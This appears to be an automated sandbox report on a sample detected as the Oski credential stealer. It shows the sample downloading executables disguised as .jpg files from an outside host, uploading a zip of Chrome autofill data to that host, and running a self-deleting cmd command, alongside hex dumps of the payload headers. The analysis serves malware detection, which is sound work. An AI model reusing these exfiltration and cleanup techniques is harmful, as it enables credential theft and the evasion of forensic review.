Oct 12, 2021 12:35:37.850735903 CEST	2428	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:37 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:30 GMT ETag: "6b738-58aa3f5b2ee80" Accept-Ranges: bytes Content-Length: 440120 Vary: User-Agent Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Oct 12, 2021 12:35:38.665185928 CEST	2887	OUT	POST /5.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:38.691800117 CEST	2889	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:38 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT ETag: "1303d0-58aa3f6888e00" Accept-Ranges: bytes Content-Length: 1246160 Vary: User-Agent Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Oct 12, 2021 12:35:39.823961973 CEST	4176	OUT	POST /7.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:39.850475073 CEST	4177	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:39 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT ETag: "14748-58aa3f79b3680" Accept-Ranges: bytes Content-Length: 83784 Vary: User-Agent Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Oct 12, 2021 12:35:40.512995005 CEST	4264	OUT	POST /main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:40.645077944 CEST	4264	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:40 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/5.6.37 Vary: User-Agent Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 12, 2021 12:35:41.066500902 CEST	4265	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 77595 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache
Oct 12, 2021 12:35:41.066726923 CEST	4281	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5f 37 33 34 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="file"; filename="_7345731404.zip"Content-Type: zipPKpLS"autofill/Google Chrome_Default.txtUTeaeaeaPKpLScc/Google Chr
Oct 12, 2021 12:35:41.092928886 CEST	4282	OUT	Data Raw: 5f bf ee 39 a4 21 ea e9 f6 cc 33 f0 4c fa fa 59 6d c4 82 5d f1 ce 93 d8 5a d9 f7 02 b0 2c c6 a0 32 6e 85 41 2d c7 a6 85 37 f4 dd ff b3 c3 60 a1 d8 fd ab 6a cf 23 ee c7 b2 08 51 dd 7d d9 e7 8d 86 94 d2 fc 7e 84 41 ab 92 bd 7e 9c eb db 25 3c 76 56 Data Ascii: _9!3LYm]Z,2nA-7`j#Q}~A~%<vV{>jBq3\|%"Iy@N6H75WIWW^5MRwtiknq7~hKOeh:=9cw_TkY7WimY};)]D2$U7.s<(w\|e.~%
Oct 12, 2021 12:35:41.092979908 CEST	4287	OUT	Data Raw: e9 6b b3 51 b6 87 fe 6e d3 c2 b7 e6 67 0f b3 23 ee b8 06 ee 17 39 c7 42 75 b0 9e b2 6b bf 4f a9 3f b9 ad 0d 17 a2 00 4a 6f bc 23 7d 35 3e a6 01 66 f1 92 50 53 11 d0 b0 3e 6b 76 8a 26 39 ab f3 dd 14 2d 25 05 80 cc e0 1c c4 e9 07 dc a8 e9 13 0d fe Data Ascii: kQng#9BukO?Jo#}5>fPS>kv&9-%%oO?oj}k=dh5(y0inZS/$iam*2Fl]Dr[Z=is!~s!dmdd5N9){\w7i579,WT{H5
Oct 12, 2021 12:35:41.093184948 CEST	4311	OUT	Data Raw: cd 75 25 7e 85 25 d3 ae 55 94 ba ba 14 b3 3a 2d dc cf 48 08 70 c2 44 36 19 08 79 4e 34 04 dc 90 ef 17 8b 8b c5 51 5c 68 6d c0 e7 c9 ab e9 86 10 ec 02 d0 e4 e8 0b 8f 99 05 ae 2e 00 bc 35 60 57 91 58 70 ec ec 68 62 22 0e e9 af c8 77 b1 93 51 26 29 Data Ascii: u%~%U:-HpD6yN4Q\hm.5`WXphb"wQ&)$;W0,UGep:(#[N"u[jRm9jb4UyqH09?iqYwC9qv. OsqpM7zkJL!^p+9,LQJHg<cc
Oct 12, 2021 12:35:41.120393038 CEST	4314	OUT	Data Raw: 30 79 8a 5f 28 d8 b9 8f 46 13 cc 34 14 42 60 0c e9 57 90 7c 65 30 1a 3d dc 2d 37 0f 49 84 50 d0 20 40 9d 64 64 f0 48 c1 12 0b 36 68 2a 96 70 0d 0a 40 61 27 ac 48 cd b5 08 71 01 cc c0 c4 68 33 48 4a 8a 9e 2e d6 af a5 33 d0 2c a6 5b 47 1b 96 d0 19 Data Ascii: 0y_(F4B`W\|e0=-7IP @ddH6hp@a'Hqh3HJ.3,[G1ukR[kIDe3+O!a]{eXfxW^0CxR"iT;W^xx8#"$$>5"T@%@koN\h-al?}\s1%,h`Gtad1(8r+
Oct 12, 2021 12:35:41.121381044 CEST	4319	OUT	Data Raw: 1f c7 18 a9 7f 3b 58 36 fa 63 b1 cb c7 b9 f4 c1 d2 f5 c1 7c ab f6 24 fc 85 86 8f a3 09 69 08 5f bd 28 8b 6a ca 99 4a 6a e7 38 65 1d cd 45 d2 ad 9d 8d bc 9f f2 fc fa 21 e4 01 bc 7e b2 d7 c4 b4 c8 8a 8b 2c b0 9d fd 1f 7c be bd 1f 73 f9 53 ca 50 a5 Data Ascii: ;X6c\|$i_(jJj8eE!~,\|sSPO!a].Uz=/UY&r>](* 9@u7-]E{q-Z8?`y;".wl[Z+<Urr&? lbu9z.f}"a\
Oct 12, 2021 12:35:41.124455929 CEST	4342	OUT	Data Raw: e5 4e aa 57 a9 9f ee e2 c5 88 d4 ec 7b 67 16 f9 86 9e 97 ce b1 60 3d 86 b2 cb 25 87 3c 0b 33 2f 1a 34 60 9a 1f 4d fc db 4f 53 2e 38 e4 59 f2 5e 0a 7b 65 e8 39 b0 bf a9 c4 c7 3a c3 5f 6a 31 96 47 0e 40 2e 31 d7 5e 39 ff 33 a1 ab 7a 17 1e 6b f8 4b Data Ascii: NW{g`=%<3/4`MOS.8Y^{e9:_j1G@.1^93zkKi\c>3eD<~{Q6F*y?9:8A @m"saD@"Z&xh-Ht@Kq0D7@30mzYh7`ChS+~)s;Gt3
Oct 12, 2021 12:35:41.196186066 CEST	4342	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:41 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/5.6.37 Vary: User-Agent Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: buIKlB688e.exe PID: 7132 Parent PID: 2468

General

Start time:	12:35:20
Start date:	12/10/2021
Path:	C:\Users\user\Desktop\buIKlB688e.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\buIKlB688e.exe'
Imagebase:	0xa30000
File size:	557056 bytes
MD5 hash:	C7AB84A215A60E703E2906F68A1BAE13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.371477115.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000000.00000002.372435163.0000000003E39000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: buIKlB688e.exe PID: 6076 Parent PID: 7132

General

Start time:	12:35:33
Start date:	12/10/2021
Path:	C:\Users\user\Desktop\buIKlB688e.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\buIKlB688e.exe
Imagebase:	0x310000
File size:	557056 bytes
MD5 hash:	C7AB84A215A60E703E2906F68A1BAE13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: buIKlB688e.exe PID: 5364 Parent PID: 7132

General

Start time:	12:35:33
Start date:	12/10/2021
Path:	C:\Users\user\Desktop\buIKlB688e.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\buIKlB688e.exe
Imagebase:	0x5f0000
File size:	557056 bytes
MD5 hash:	C7AB84A215A60E703E2906F68A1BAE13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5600 Parent PID: 5364

General

Start time:	12:35:42
Start date:	12/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5064 Parent PID: 5600

General

Start time:	12:35:43
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 5960 Parent PID: 5600

General

Start time:	12:35:43
Start date:	12/10/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /pid 5364
Imagebase:	0x880000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: buIKlB688e.exe PID: 7132 Parent PID: 2468 buIKlB688e.exeCOMMON

Executed Functions

Function 0120E560, Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa172d8cd3cffcfd5e6722f5895068ec775c2163a4f75a8a979b89af4e7c4ef9
Instruction ID: 5725abe211111f6941314dc3723e10003f150c082ed173667fde5a51fec3151a
Opcode Fuzzy Hash: fa172d8cd3cffcfd5e6722f5895068ec775c2163a4f75a8a979b89af4e7c4ef9
Instruction Fuzzy Hash: 15D14EB1811746CBE720EF65F88C19BBBB1FB85328F504728D1616B6D9E7B4108ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0120B690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0120B6F0
GetCurrentThread.KERNEL32 ref: 0120B72D
GetCurrentProcess.KERNEL32 ref: 0120B76A
GetCurrentThreadId.KERNEL32 ref: 0120B7C3

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c3992ccc9e9d31637bf5d6aef1861879994510d2bd67c57f63e01614f4e08936
Instruction ID: 9fe9cc8acdba5bbf8db13912857da2973042c86b1edff077a70ec964e1e21649
Opcode Fuzzy Hash: c3992ccc9e9d31637bf5d6aef1861879994510d2bd67c57f63e01614f4e08936
Instruction Fuzzy Hash: B25175B4D006498FEB18CFAAC9887DEBBF0AF48314F248569E419A32A0D7745884CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0120FCF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0120FE0A

Memory Dump Source

Source File: 00000000.00000002.370426850.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6679f54f9208eada813d5e46a44c57d52115e214838e5a772728e62c7d963901
Instruction ID: 3e51b8f19aff3b4477782524da943fd5b95f13fce185560ad614de37d881fa9e
Opcode Fuzzy Hash: 6679f54f9208eada813d5e46a44c57d52115e214838e5a772728e62c7d963901
Instruction Fuzzy Hash: 8D41EEB1D103099FDF14CF99C980ADEBFB5BF48314F24822AE919AB251D770A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01203DE4, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01205421

Memory Dump Source

